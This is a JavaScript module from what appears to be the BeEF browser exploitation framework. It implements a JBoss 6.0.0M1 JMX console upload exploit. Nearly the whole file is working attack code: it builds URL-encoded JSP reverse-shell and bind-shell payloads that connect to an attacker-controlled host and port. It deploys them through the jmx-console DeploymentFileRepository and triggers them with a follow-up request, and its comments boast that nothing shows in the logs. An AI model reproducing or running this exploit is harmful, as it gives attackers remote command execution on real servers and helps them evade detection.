/modules/network/jboss_jmx_upload_exploit/command.js
JavaScript | 67 lines | 37 code | 5 blank | 25 comment | 8 complexity | feab355b14b56a61242f5490eed67f87 MD5 | raw file
- //
- // Copyright 2011 Wade Alcorn wade@bindshell.net
- //
- // Licensed under the Apache License, Version 2.0 (the "License");
- // you may not use this file except in compliance with the License.
- // You may obtain a copy of the License at
- //
- // http://www.apache.org/licenses/LICENSE-2.0
- //
- // Unless required by applicable law or agreed to in writing, software
- // distributed under the License is distributed on an "AS IS" BASIS,
- // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- // See the License for the specific language governing permissions and
- // limitations under the License.
- //
- /**
- * Jboss 6.0.0M1 JMX Upload Exploit
- * Ported from l33tb0y Ruby code in Javascript by antisnatchor.
- * HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler OR shell binding to high port
- *
- * This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell.
- * This is the stealthiest approach: nothing is shown on the logs
- */
- beef.execute(function() {
- rhost = "<%= @rhost %>";
- rport = "<%= @rport %>";
- lhost = "<%= @lhost %>";
- lport = "<%= @lport %>";
- injectedCommand = "<%= @injectedCommand %>";
- jspName = "<%= @jspName %>";
- payloadType = "<%= @payload %>";
- reverse = "try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
- bind = "try%20%7B%20ServerSocket%20server_socket%20=%20new%20ServerSocket(%20" + lport + "%20);%20Socket%20socket%20=%20server_socket.accept();%20server_socket.close();%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
- if(payloadType == "reverse"){
- payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + reverse + "%25%3E";
- }else{
- payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + bind + "%25%3E";
- }
- uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
- /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
- beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
- if(response.status_code == "success"){
- function triggerReverseConn(){
- beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
- if(response.status_code == "success"){
- if(payloadType == "reverse"){
- beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
- }else{
- beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Bind JSP shell should have been triggered. Try to connect to "+rhost+":"+lport+".");
- }
- }else{
- beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
- }
- });
- }
- // give the time to JBoss to deploy the JSP reverse shell
- setTimeout(triggerReverseConn,10000);
- }else{
- beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
- }
- });
- });